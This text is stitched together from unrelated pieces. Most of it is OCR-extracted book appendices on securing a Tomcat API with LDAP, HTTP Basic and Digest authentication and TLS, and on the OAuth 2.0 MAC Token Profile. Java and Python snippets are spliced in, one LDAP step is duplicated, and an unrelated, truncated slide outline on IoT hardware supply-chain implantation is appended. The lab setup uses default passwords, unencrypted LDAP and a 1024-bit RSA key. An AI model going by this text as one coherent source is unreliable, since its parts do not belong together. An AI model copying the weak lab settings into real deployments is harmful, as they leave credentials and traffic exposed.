1. From Apache Directory Studio, go to the Connections view. If it's not there already, go to Window ➤ Show View ➤ Connections.
2. Right-click the Connections view, and select New Connection.
3. In the Connection Name text box, give the connection a name.
4. The Host Name field should point to the host where you started the LDAP server. In this case, it's localhost.
5. The Port field should point to the port of your LDAP server, which is 10389 in this case.
6. Keep Encryption Method set to No Encryption for the time being. Click Next.
7. Type uid=admin,ou=system as the Bind DN and secret as the Bind Password, and click Finish. These are the default Bind DN and password values for Apache Directory Server.
8. The connection you just created appears in the Connections view. Double-click it, and the data retrieved from the underlying LDAP server appears in the LDAP Browser view.
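If you prefer to verify the connection from code rather than from the Studio UI, the following minimal JNDI sketch binds to the server with the same host, port, and default credentials used in the steps above.

import java.util.Hashtable;
import javax.naming.Context;
import javax.naming.directory.DirContext;
import javax.naming.directory.InitialDirContext;

public class LdapBindTest {
    public static void main(String[] args) throws Exception {
        Hashtable<String, String> env = new Hashtable<>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389");
        env.put(Context.SECURITY_AUTHENTICATION, "simple");
        // Default Apache Directory Server admin credentials used in the steps above.
        env.put(Context.SECURITY_PRINCIPAL, "uid=admin,ou=system");
        env.put(Context.SECURITY_CREDENTIALS, "secret");

        DirContext ctx = new InitialDirContext(env);   // throws an exception if the bind fails
        System.out.println("Bound to " + ctx.getNameInNamespace());
        ctx.close();
    }
}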
double-click it, and the data retrieved from the underlying LdAP server appears in the LdAP Browser view. In the sections that follow, you need some users and groups in the LdAP server. Let’s create a user and a group. First you need to create an organizational unit (oU) structure under the dc=example,dc=com domain in Apache directory Server: 1. In Apache directory Studio, get to the LdAP browser by clicking the appropriate LdAP connection in the connections view. 2. Right-click dc=example,dc=com, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick organizationalUnit from Available object classes, click Add, and then click next. Select ou for the Rdn, and give it the value groups. click next and then Finish. 3. Right-click dc=example,dc=com, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick organizationalUnit from Available object class, click Add, and then click next. Select ou for the Rdn, and give it the value users. click next and then Finish. APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 417 4. Right-click dc=example,dc=com/ou=users, and choose new ➤ new Entry ➤ create Entry From Scratch. Pick inetorgPerson from Available object class, click Add, and then click next. Select uid for the Rdn, give it a value, and click next. complete the empty fields with appropriate values. Right-click the same pane, and choose new Attribute. Select userPassword as the Attribute Type, and click Finish. Enter a password, select SSHA-256 as the hashing method, and click oK. 5. The user you created appears under dc=example,dc=com/ou=users in the LdAP browser. 6. To create a group, right-click dc=example,dc=com/ou=groups ➤ new ➤ new Entry ➤ create Entry From Scratch. Pick groupofUniquenames from Available object class, click Add, and click next. Select cn for the Rdn, give it a value, and click next. Give the dn of the user created in the previous step as the uniqueMember (e.g., uid=prabath,ou=users,ou=system), and click Finish. 7. The group you created appears under dc=example,dc=com/ou=groups in the LdAP browser. CONNECTING APACHE TOMCAT TO APACHE DIRECTORY SERVER (LDAP) You’ve already deployed the Recipe API in Apache Tomcat. Let’s see how you can configure Apache Tomcat to talk to the LdAP server you configured, following these steps: 1. Shut down the Tomcat server if it’s running. 2. By default, Tomcat finds users from the conf/tomcat-users.xml file via org.apache.catalina.realm.UserDatabaseRealm. 3. open [TOMCAT_HOME]\conf\server.xml, and comment out the following line in it: <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 418 factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> 4. In [TOMCAT_HOME]\conf\server.xml, comment out the following line, which points to the UserDatabaseRealm: <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> 5. To connect to the LdAP server, you should use the JNDIRealm. 
copy and paste the following configuration into [ToMcAT_HoME]\conf\server.xml just after <Realm classname="org.apache.catalina.realm.LockoutRealm">: <Realm className="org.apache.catalina.realm.JNDIRealm" debug="99" connectionURL="ldap://localhost:10389" roleBase="ou=groups , dc=example, dc=com" roleSearch="(uniqueMember={0})" roleName="cn" userBase="ou=users, dc=example, dc=com" userSearch="(uid={0})"/> SECURING AN API WITH HTTP BASIC AUTHENTICATION The Recipe API that you deployed in Apache Tomcat is still an open API. Let’s see how to secure it with HTTP Basic authentication. You want to authenticate users against the corporate LdAP server and also use access control based on HTTP operations (GET, POST, DELETE, PUT). The following steps guide you on how to secure the Recipe API with HTTP Basic authentication: 1. Shut down the Tomcat server if it’s running, and make sure connectivity to the LdAP server works correctly. 2. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml and add the following under the root element <web-app>. The security-role element at the bottom of the following configuration lists all the roles allowed to use this web application: APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 419 <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> <url-pattern>/∗</url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> </security-role> This configuration will protect the complete Recipe API from unauthenticated access attempts. A legitimate user should have an account in the corporate LdAP server and also should be in the admin group. If you don’t have a group called admin, change the preceding configuration appropriately. 3. You can further enable fine-grained access control to the Recipe API by HTTP operation. You need to have a <security-constraint> element defined for each scenario. The following two configuration blocks will let any user that belongs to the admin group perform GET/POST/PUT/DELETE on the Recipe API, whereas a user that belongs to the user group can only do a GET. When you define an http-method inside a web-resource-collection element, only those methods are protected. The rest can be invoked by anyone if no other security constraint has any restrictions on those methods. For example, if you only had the second block, then any user would be able to do a POST. Having the first block that controls POST will allow only the legitimate user to do a POST to the Recipe API. 
The security-role element at the bottom of the following configuration lists all the roles allowed to use this web application: <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 420 <url-pattern>/∗</url-pattern> <http-method>GET</http-method> <http-method>PUT</http-method> <http-method>POST</http-method> <http-method>DELETE</http-method> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource-name> <url-pattern>/∗</url-pattern> <http-method>GET</http-method> </web-resource-collection> <auth-constraint> <role-name>user</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>BASIC</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> <role-name>user</role-name> </security-role> ENABLING TLS IN APACHE TOMCAT The way you configured HTTP Basic authentication in the previous exercise isn’t secure enough. It uses HTTP to transfer credentials. Anyone who can intercept the channel can see the credentials in cleartext. Let’s see how to enable Transport Layer Security (TLS) in Apache Tomcat and restrict access to the Recipe API only via TLS: APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 421 1. To enable TLS, first you need to have a keystore with a public/private key pair. You can create a keystore using Java keytool. It comes with the JdK distribution, and you can find it in [JAVA_HoME]\bin. The following command creates a Java keystore with the name catalina-keystore.jks. This command uses catalina123 as the keystore password as well as the private key password. Note JAVA_HOME refers to the directory where you’ve installed the JdK. To run the keytool, you need to have Java installed in your system. \> keytool -genkey -alias localhost -keyalg RSA -keysize 1024 -dname "CN=localhost" -keypass catalina123 -keystore catalina-keystore.jks -storepass catalina123 2. copy catalina-keystore.jks to [TOMCAT_HOME]\conf, and add the following element to [TOMCAT_HOME]\conf\server.xml under the <Service> parent element. Replace the values of keyStoreFile and keystorePass elements appropriately: <Connector port="8443" maxThreads="200" scheme="https" secure="true" SSLEnabled="true" keystoreFile="absolute/path/to/catalina-keystore.jks" keystorePass="catalina123" clientAuth="false" sslProtocol="TLS"/> 3. Start the Tomcat server, and execute the following cURL command to validate the TLS connectivity. Make sure you replace the values of username and password appropriately. They must come from the underlying user store: \> curl -k -u username:password https://localhost:8443/recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 422 You’ve configured Apache Tomcat to work with TLS. next you need to make sure that the Recipe API only accepts connections over TLS. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml, and add the following under each <security-constraint> element. This makes sure only TLS connections are accepted: <user-data-constraint> <transport-guarantee>CONFIDENTIAL</transport-guarantee> </user-data-constraint> SECURING THE RECIPE API WITH HTTP DIGEST AUTHENTICATION The Tomcat JNDIRealm that you used previously to connect to the LdAP server doesn’t support HTTP digest authentication. 
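To see why this matters, recall how the digest sent by the client is derived. The following is a minimal sketch in Python of the RFC 2617 calculation with qop=auth; the nonce, nc, and cnonce values are purely illustrative, while the username, realm, and password match the examples used elsewhere in this appendix:

import hashlib

def md5_hex(value):
    return hashlib.md5(value.encode("utf-8")).hexdigest()

def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    # HA1 is what the server must be able to reproduce from its user store.
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")

# Illustrative nonce values; username, realm, and password taken from this appendix's examples.
print(digest_response("prabath", "cute-cupcakes.com", "prabath123",
                      "GET", "/recipe", "dcd98b7102dd2f0e", "00000001", "0a4f113b"))

The server can validate the response only if it can recompute HA1, which is why the user store must hold either the cleartext password or the stored hash of username:realm:password.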
If you need HTTP digest authentication support, you have to write your own Realm, extending Tomcat JNDIRealm, and override the getPassword() method. To see how to secure an API with digest authentication, we need to switch back to the Tomcat UserDatabaseRealm: 1. open [TOMCAT_HOME]\conf\server.xml, and make sure that the following line is there. If you commented this out during a previous exercise, revert it back: <Resource name="UserDatabase" auth="Container" type="org.apache.catalina.UserDatabase" description="User database that can be updated and saved" factory="org.apache.catalina.users.MemoryUserDatabaseFactory" pathname="conf/tomcat-users.xml" /> 2. In [TOMCAT_HOME]\conf\server.xml, make sure that the following line, which points to UserDatabaseRealm, is there. If you commented it out during a previous exercise, revert it back: <Realm className="org.apache.catalina.realm.UserDatabaseRealm" resourceName="UserDatabase"/> APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 423 3. open [TOMCAT_HOME]\webapps\recipe\WEB-INF\web.xml, and add the following under the root element <web-app>: <security-constraint> <web-resource-collection> <web-resource-name>Secured Recipe API</web-resource- name> <url-pattern>/∗ </url-pattern> </web-resource-collection> <auth-constraint> <role-name>admin</role-name> </auth-constraint> </security-constraint> <login-config> <auth-method>DIGEST</auth-method> <realm-name>cute-cupcakes.com</realm-name> </login-config> <security-role> <role-name>admin</role-name> </security-role> 4. open [TOMCAT_HOME]\conf\tomcat-users.xml, and add the following under the root element. This adds a role and a user to Tomcat’s default file system–based user store: <role rolename="admin"/> <user username="prabath" password="prabath123" roles="admin"/> 5. Invoke the API with the cURL command shown next. The --digest -u username:password option used here generates the password in digest mode and adds it to the HTTP request. Replace username:password with appropriate values: \> curl -k -v --digest -u username:password https://localhost:8443/ recipe APPEndIx F BASIc/dIGEST AUTHEnTIcATIon 425 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_22 APPENDIX G OAuth 2.0 MAC Token Profile The OAuth 2.0 core specification doesn’t mandate any specific token type. It’s one of the extension points introduced in OAuth 2.0. Almost all public implementations use the OAuth 2.0 Bearer Token Profile. This came up with the OAuth 2.0 core specification, but as an independent profile, documented under RFC 6750. Eran Hammer, who was the lead editor of the OAuth 2.0 specification by that time, introduced the Message Authentication Code (MAC) Token Profile for OAuth 2.0. (Hammer also led the OAuth 1.0 specification.) Since its introduction to the OAuth 2.0 IETF working group in November 2011, the MAC Token Profile has made a slow progress. The slow progress was mostly due to the fact that the working group was interested in building a complete stack around bearer tokens before moving into another token type. In this chapter, we will take a deeper look into the OAuth 2.0 MAC Token Profile and its applications. OAUTH 2.0 AND THE ROAD TO HELL One of the defining moments of OAuth 2.0 history was the resignation of OAuth 2.0 specification lead editor Eran Hammer. On July 26, 2012, he wrote a famous blog post titled “OAuth 2.0 and the Road to Hell”1 after announcing his resignation from the OAuth 2.0 IETF working group. 
As highlighted in the blog post, Hammer thinks OAuth 2.0 is a bad protocol, just like any WS-* (web services) standard. In his comparison, OAuth 1.0 is much better than OAuth 2.0 in terms of complexity, interoperability, usefulness, completeness, and security. Hammer was worried about the direction in which OAuth 2.0 was heading, because it was not what was intended by the web community that initially formed the OAuth 2.0 working group. 1 Available at http://hueniverse.com/2012/07/oauth-2-0-and-the-road-to-hell/ 426 According to Hammer, the following were the initial objectives of the OAuth 2.0 working group: • Build a protocol very similar to OAuth 1.0. • Simplify the signing process. • Add a light identity layer. • Address native applications. • Add more flows to accommodate more client types. • Improve security. In his blog post, Hammer highlighted the following architectural changes from OAuth 1.0 to 2.0 (extracted from http://hueniverse.com/2012/07/oauth-2-0-and-the-road-to- hell/): • Unbounded tokens: In 1.0, the client has to present two sets of credentials on each protected resource request, the token credentials and the client credentials. In 2.0, the client credentials are no longer used. This means that tokens are no longer bound to any particular client type or instance. This has introduced limits on the usefulness of access tokens as a form of authentication and increased the likelihood of security issues. • Bearer tokens: 2.0 got rid of all signatures and cryptography at the protocol level. Instead, it relies solely on TLS. This means that 2.0 tokens are inherently less secure as specified. Any improvement in token security requires additional specifications, and as the current proposals demonstrate, the group is solely focused on enterprise use cases. • Expiring tokens: 2.0 tokens can expire and must be refreshed. This is the most significant change for client developers from 1.0, as they now need to implement token state management. The reason for token expiration is to accommodate self-encoded tokens—encrypted tokens, which can be authenticated by the server without a database look-up. Because such tokens are self-encoded, they cannot be revoked and therefore must be short-lived to reduce their exposure. Whatever is gained from the removal of the signature is lost twice in the introduction of the token state management requirement. • Grant types: In 2.0, authorization grants are exchanged for access tokens. Grant is an abstract concept representing the end user approval. It can be a code received after the user clicks “Approve” on an access request, or the AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 427 user’s actual username and password. The original idea behind grants was to enable multiple flows. 1.0 provides a single flow, which aims to accommodate multiple client types. 2.0 adds significant amount of specialization for different client types. Most of all, Hammer wasn’t in favor of the authorization framework built by OAuth 2.0 and the extensibility introduced. His argument was that the Web doesn’t need another security framework: what it needs is a simple, well-defined security protocol. Regardless of these arguments, over the years OAuth 2.0 has become the de facto standard for API security—and the extensibility introduced by OAuth 2.0 is paying off. Bearer Token vs. MAC Token Bearer tokens are just like cash. Whoever owns one can use it. At the time you use it, you don’t need to prove you’re the legitimate owner. 
It’s similar to the way you could use stolen cash with no problem; what matters is the validity of the cash, not the owner. MAC tokens, on the other hand, are like credit cards. Whenever you use a credit card, you have to authorize the payment with your signature. If someone steals your card, the thief can’t use it unless they know how to sign exactly like you. That’s the main advantage of MAC tokens. With bearer tokens, you always have to pass the token secret over the wire. But with MAC tokens, you never pass the token secret over the wire. The key difference between bearer tokens and MAC tokens is very similar to the difference between HTTP Basic authentication and HTTP Digest authentication, which we discussed in Appendix F. Note draft 5 of the OAuth 2.0 MAC Token profile is available at http:// tools.ietf.org/html/draft-ietf-oauth-v2-http-mac-05. This chapter is based on draft 5, but this is an evolving specification. The objective of this chapter is to introduce the MAC Token profile as an extension of OAuth token types. The request/response parameters discussed in this chapter may change as the specification evolves, but the basic concepts will remain the same. It’s recommended that you keep an eye on https://datatracker.ietf.org/ doc/draft-ietf-oauth-v2-http-mac/ to find out the latest changes taking place. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 428 Obtaining a MAC Token The OAuth 2.0 core specification isn’t coupled with any of the token profiles. The OAuth flows discussed in Chapter 4 applies in the same way for MAC tokens. OAuth grant types don’t have any dependency on the token type. A client can obtain a MAC token by using any grant type. Under the authorization code grant type, the resource owner that visits the application initiates the flow. The client, which must be a registered application at the authorization server, redirects the resource owner to the authorization server to get the approval. The following is a sample HTTP redirect, which takes the resource owner to the OAuth authorization server: https://authz.server.com/oauth2/authorize?response_type=code& client_id=0rhQErXIX49svVYoXJGt0DWBuFca& redirect_uri=https%3A%2F%2Fmycallback The value of response_type must be code. This indicates to the authorization server that the request is for an authorization code. client_id is an identifier for the client application. Once the client application is registered with the authorization server, the client gets a client_id and a client_secret. The value of redirect_uri should be same as the value registered with the authorization server. During the client registration phase, the client application must provide a URL under its control as the redirect_uri. The URL- encoded value of the callback URL is added to the request as the redirect_uri parameter. In addition to these parameters, a client application can also include a scope parameter. The value of the scope parameter is shown to the resource owner on the approval screen. It indicates to the authorization server the level of access the client needs on the target resource/API. The previous HTTP redirect returns the requested code to the registered callback URL: https://mycallback/?code=9142d4cad58c66d0a5edfad8952192 The value of the authorization code is delivered to the client application via an HTTP redirect and is visible to the resource owner. In the next step, the client must exchange the authorization code for an OAuth access token by talking to the OAuth token endpoint exposed by the authorization server. 
This can be an authenticated request with the client_id and the client_secret of the client application in the HTTP authorization header, if the token endpoint is secured with HTTP Basic authentication. The value of the grant_type parameter must be the authorization_code, and the value of the code AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 429 should be the one returned from the previous step. If the client application set a value for the redirect_uri parameter in the previous request, then it must include the same value in the token request. The client can’t suggest to the authorization server the type of token it expects: it’s entirely up to the authorization server to decide, or it can be based on a pre-agreement between the client and the authorization server at the time of client registration, which is outside the scope of OAuth. The following cURL command to exchange the authorization code for a MAC token is very similar to what you saw for the Bearer Token Profile (in Chapter 4). The only difference is that this introduces a new parameter called audience, which is a must for a MAC token request: \> curl -v -X POST --basic -u 0rhQErXIX49svVYoXJGt0DWBuFca:eYOFkL756W8usQaVNgCNkz9C2D0a -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" -k -d "grant_type=authorization_code& code=9142d4cad58c66d0a5edfad8952192& redirect_uri=https://mycallback& audience=https://resource-server-URI" https://authz.server.com/oauth2/token The previous cURL command returns the following response: HTTP/1.1 200 OK Content-Type: application/json Cache-Control: no-store { "access_token": "eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", "token_type":"mac", "expires_in":3600, "refresh_token":"8xLOxBtZp8", "kid":"22BIjxU93h/IgwEb4zCRu5WF37s=", "mac_key":"adijq39jdlaska9asud", "mac_algorithm":"hmac-sha-256" } AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 430 Let’s examine the definition of each parameter: access_token: The OAuth 2.0 access token, which binds the client, the resource owner, and the authorization server together. With the introduction of the audience parameter, this now binds all of those with the resource server as well. Under the MAC Token Profile, by decoding the access token, you should be able to find the audience of the access token. If someone tampers with the access token to change the audience, that will make the token validation fail automatically at the authorization server. token_type: Type of the token returned from the authorization server. The client should first try to understand the value of this parameter and begin processing accordingly. The processing rules differ from one token type to another. Under the MAC Token Profile, the value of the token type must be mac. expires_in: The lifetime of the access token in seconds. refresh_token: The refresh token associated with the access token. The refresh token can be used to acquire a new access token. kid: Stands for key identifier. This is an identifier generated by the authorization server. It’s recommended that you generate the key identifier by base64 encoding the hashed access token: kid = base64encode (sha-1 (access_token)). This identifier uniquely identifies the mac_key used later to generate the MAC while invoking the resource APIs. mac_key: A session key generated by the authorization server, having the same lifetime as the access token. The mac_key is a shared secret used later to generate the MAC while invoking the resource APIs. The authorization server should never reissue the same mac_key or the same kid. 
mac_algorithm: The algorithm to generate the MAC during API invocation. The value of the mac_algorithm should be well understood by the client, authorization server, and resource server. The OAuth 2.0 access token is opaque to anyone outside the authorization server. It may or may not carry meaningful data, but no one outside the authorization server should try to interpret it. The OAuth 2.0 MAC Token Profile defines a more meaningful structure for the access token; it’s no longer an arbitrary string. The resource server should understand the structure of the access token generated by the authorization server. Still, the client should not try to interpret it. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 431 The access token returned from the authorization server to the client is encoded with the audience, key identifier, and encrypted value of the mac_key. The mac_key must be encrypted with the public key of the resource server or with a shared key established between the resource server and the authorization server via a prior agreement outside the scope of OAuth. When accessing a protected API, the client must send the access token along with the request. The resource server can decode the access token and get the encrypted mac_key, which it can later decrypt from its own private key or the shared key. OAUTH 2.0 AUDIENCE INFORMATION The audience parameter is defined in the OAuth 2.0: Audience Information Internet draft available at http://tools.ietf.org/html/draft-tschofenig-oauth- audience-00. This is a new parameter introduced into the OAuth token request flow and is independent of the token type. Once it’s approved as an IETF proposed standard, the Bearer Token profile also will be updated to include this in the access token request. The objective of the audience parameter introduced by the OAuth 2.0: Audience Information Internet draft is to identify the audience of an issued access token. With this, the access token issued by the authorization server is for a specific client, to be used against a specific resource server or a specific set of resource servers. All resource servers should validate the audience of the access token before considering it valid. After completing the authorization-granting phase, the client must decide which resource server to access and should find the corresponding audience uRI. That must be included in the access token request to the token endpoint. Then the authorization server must check whether it has any associated resource servers that can be identified by the provided audience uRI. If not, it must send back the error code invalid_request. If all validations pass at the authorization server, the new Internet draft suggests including the allowed audience in the access token. While invoking an ApI hosted in the resource server, it can decode the access token and find out whether the allowed audience matches its own. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 432 Invoking an API Protected with the OAuth 2.0 MAC Token Profile Following any of the grant types, you can obtain a MAC token from the authorization server. Unlike with the Bearer Token Profile, this needs more processing at the client end before you invoke an API protected with the MAC Token Profile. Prior to invoking the protected API, the client must construct an authenticator. The value of the authenticator is then added to the HTTP authorization header of the outgoing request. 
The authenticator is constructed from the following parameters: kid: The key identifier from the authorization grant response. ts: Timestamp, in milliseconds, since January 1, 1970. seq-nr: Indicates the initial sequence number to be used during the message exchange between the client and the resource server, from client to server. access_token: The value of the access token from the authorization grant response. mac: The value of the MAC for the request message. Later, this appendix discusses how to calculate the MAC. h: Colon-separated header fields, used to calculate the MAC. cb: Specifies the channel binding. Channel bindings are defined in “Channel Bindings for TLS,” RFC 5929, available at http://tools.ietf.org/html/rfc5929. The Channel Bindings for TLS RFC defines three bindings: tls-unique, tls-server-end- point, and tls-unique-for-telnet. The following is a sample request to access an API secured with an OAuth 2.0 MAC Token Profile. GET /patient?name=peter&id=10909HTTP/1.1 Host: medicare.com Authorization: MAC kid="22BIjxU93h/IgwEb4zCRu5WF37s=", ts="1336363200", seq-nr="12323", access_token="eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM=", h="host", cb="tls-unique:9382c93673d814579ed1610d3" AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 433 Calculating the MAC The OAuth 2.0 MAC Token Profile defines two algorithms to calculate the MAC: HMAC- SHA1 and HMAC-SHA256. It also provides an extension for additional algorithms. The Message Authentication Code (MAC) provides integrity and authenticity assurance for the associated message. The MAC algorithm accepts a message and a secret key to produce the associated MAC. To verify the MAC, the receiving party should have the same key and calculate the MAC of the received message. If the calculated MAC is equal to the MAC in the message, that guarantees integrity and authenticity. A Hash-based Message Authentication Code (HMAC) is a specific way of calculating the MAC using a hashing algorithm. If the hashing algorithm is SHA-1, it’s called HMAC-SHA1. If the hashing algorithm is SHA256, then it’s called HMAC-SHA256. More information about HMAC is available at http://tools.ietf.org/html/rfc2104. The HMAC-SHA1 and HMAC-SHA256 functions need to be implemented in the corresponding programming language. Here’s the calculation with HMAC-SHA1: mac = HMAC-SHA1(mac_key, input-string) And here it is with HMAC-SHA256: mac = HMAC-SHA256(mac_key, input-string) For an API invocation request, the value of input-string is the Request-Line from the HTTP request, the timestamp, the value of seq-nr, and the concatenated values of the headers specified under the parameter h. HTTP REQUEST-LINE The HTTp Request-Line is defined in Section 5 of the HTTp RFC, available at www.w3.org/ Protocols/rfc2616/rfc2616-sec5.html. The request line is defined as follows: Request-Line = Method SP Request-URI SP HTTP-Version CRLF The value of Method can be OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT, or any extension method. SP stands for space—to be technically accurate, it’s ASCII code 32. Request-URI identifies the representation of the resource where the request is sent. According to the HTTp specification, there are four ways to construct a Request-URI: AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 434 Request-URI = "∗" | absoluteURI | abs_path | authority The asterisk (*) means the request targets not a specific resource but the server itself, for example, OpTIOnS * HTTp/1.1. 
The absoluteURI must be used when the request is made through a proxy, for example, GET https://resource-server/myresource HTTP/1.1. abs_path is the most common form of a Request-URI. In this case, the absolute path with respect to the host server is used. The uRI or the network location of the server is transmitted in the HTTp Host header. For example: GET /myresource HTTP/1.1 Host: resource-server The authority form of the Request-URI is only used with HTTp CONNECT method. This method is used to make a connection through a proxy with tunneling, as in the case of TLS tunneling. After the Request-URI must be a space and then the HTTp version, followed by a carriage return and a line feed. Let’s take the following example: POST /patient?name=peter&id=10909&blodgroup=bpositive HTTP/1.1 Host: medicare.com The value of the input-string is POST /patient?name=peter&id=10909&blodgroup=bpositive HTTP/1.1 \n 1336363200 \n 12323 \n medicare.com \n 1336363200 is the timestamp, 12323 is the sequence number, and medicare.com is the value of the Host header. The value of the Host header is included here because it is set in the h parameter of the API request under the HTTP Authorization header. All of these entries should be separated by a newline separator character, denoted by \n in the example. Once the input string is derived, the MAC is calculated on it using the mac_key and the MAC algorithm specified under mac_algorithm. AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 435 MAC Validation by the Resource Server To access any API secured with the OAuth 2.0 MAC Token Profile, the client should send the relevant parameters with the API invocation request. If any of the parameters are lacking in the request or the provided values are invalid, the resource server will respond with an HTTP 401 status code. The value of the WWW-Authenticate header should be set to MAC, and the value of the error parameter should explain the nature of the error: HTTP/1.1 401 Unauthorized WWW-Authenticate: MAC error="Invalid credentials" Let’s consider the following valid API request, which comes with a MAC header: GET /patient?name=peter&id=10909HTTP/1.1 Host: medicare.com Authorization: MAC kid="22BIjxU93h/IgwEb4zCRu5WF37s=", ts="1336363200", seq-nr="12323", access_token="eyJhbGciOiJSU0ExXzUiLCJlbmMiOiJBM", mac="bhCQXTVyfj5cmA9uKkPFx1zeOXM=", h="host", cb="tls-unique:9382c93673d814579ed1610d3" To validate the MAC of the request, the resource server has to know the mac_key. The client must pass the mac_key to the resource server, encoded in the access_token. The first step in validation is to extract the mac_key from the access_token in the request. Once the access_token is decoded, the resource server has to verify its audience. The authorization server encodes the audience of the access_token into the access_token. Once the access_token is verified and the scopes associated with it are validated, the resource server can cache the mac_key by the kid. The cached mac_key can be used in future message exchanges. According to the MAC Token Profile, the access_token needs to be included only in the first request from the client to the resource server. The resource server must use the cached mac_key (against the kid) to validate subsequent messages in the message exchange. If the initial access_token doesn’t have enough privileges to invoke a later AppEndIx G OAuTH 2.0 MAC TOkEn pROFILE 436 API, the resource server can request a new access_token or a complete authenticator by responding with an HTTP WWW-Authenticate header. 
The resource server must calculate the MAC of the message the same way the client did before and compare the calculated MAC with the value included in the request. If the two match, the request can be considered a valid, legitimate one. But you still need to make sure there are no replay attacks. To do that, the resource server must verify the timestamp in the message by comparing it with its local timestamp. An attacker that can eavesdrop on the communication channel between the client and the resource server can record messages and replay them at a different time to gain access to the protected resource. The OAuth 2.0 MAC Token Profile uses timestamps as a way of detecting and mitigating replay attacks.

OAuth Grant Types and the MAC Token Profile

OAuth grant types and token types are two independent extension points introduced in the OAuth 2.0 core specification. They don't have any direct dependency on each other. This chapter only talks about the authorization code grant type, but all the other grant types work in the same manner: the structure of the access token returned from the implicit grant type, the resource owner password credentials grant type, and the client credentials grant type is the same.

OAuth 1.0 vs. OAuth 2.0 MAC Token Profile

Eran Hammer (who was initially the lead editor of the OAuth 2.0 specification) submitted the initial OAuth 2.0 MAC Token Profile draft to the OAuth working group in May 2011, and the next draft (also submitted by Hammer) followed with some improvements in February 2012. Both drafts were mostly influenced by the OAuth 1.0 architecture. After a long break, and after Hammer's resignation from the OAuth working group, Internet draft 4 of the MAC Token Profile introduced a revamped architecture. This architecture, which was discussed in this chapter, has many architectural differences from OAuth 1.0 (see Table G-1).

Table G-1. OAuth 1.0 vs. OAuth 2.0 MAC Token Profile

OAuth 1.0: Requires a signature both during the initial handshake and during the business API invocation.
OAuth 2.0 MAC Token Profile: Requires a signature only for the business API invocation.

OAuth 1.0: The resource server must know the secret key used to sign the message beforehand.
OAuth 2.0 MAC Token Profile: The encrypted shared secret used to sign the message is passed to the resource server, embedded in the access_token.

OAuth 1.0: The shared secret doesn't have an associated lifetime.
OAuth 2.0 MAC Token Profile: A lifetime is associated with the mac_key, which is used as the key to sign.

OAuth 1.0: Doesn't have any audience restrictions; tokens can be used against any resource server.
OAuth 2.0 MAC Token Profile: The authorization server enforces an audience restriction on the issued access_tokens, so that an access token can't be used against an arbitrary resource server.
Your Smart Hardware Is Selling You Out — A Brief Look at Hardware Supply Chain Security in Office and Education Scenarios

Agenda
• Current state of IoT product supply chain security
• Common protection mechanisms and their implementation flaws
• How to avoid these flaws and protect the supply chain

Current state of IoT product supply chain security
• More than 2,000 Gionee phones were shipped with implanted trojans. Software supply chain attacks get plenty of attention, while attacks on the hardware supply chain during the distribution stage are very easily overlooked.
• Relevant standards and regulations exist both in China and abroad.
• Industry practice: mainstream desktop processor, server, laptop, and operating system vendors implemented secure boot, trusted computing, and similar mechanisms long ago.
• Mobile processor vendors: Qualcomm, MTK, and other vendors of common IoT chip platforms provide complete SecureBoot and TEE implementation support, offering reliable protection mechanisms.
• How this actually plays out on the IoT product side: in our research we found nine IoT products from five leading vendors — all on chip platforms with full secure boot support — with design flaws that allow malicious code to be implanted during supply chain distribution.
• Vendors tend not to take this seriously or acknowledge it: "the attack requires physical access", "it is only a defect, not a vulnerability".
• Though a defect, the consequences are severe: the complex supply chain network leaves a large time window, before the product reaches the customer, in which it can be implanted in transit.
  – Smart set-top boxes, smart TVs, conference terminals: stealing trade secrets.
  – Education hardware without security protection can be cracked and repurposed away from its original design, turning into a game console or a medium for browsing inappropriate content.
  – Smart speakers, smart education screens, smart study lamps: monitoring sensitive areas of the home.
• Demo: supply chain implantation risk on an education product.

Common protection mechanisms and their implementation flaws
• Android ROM
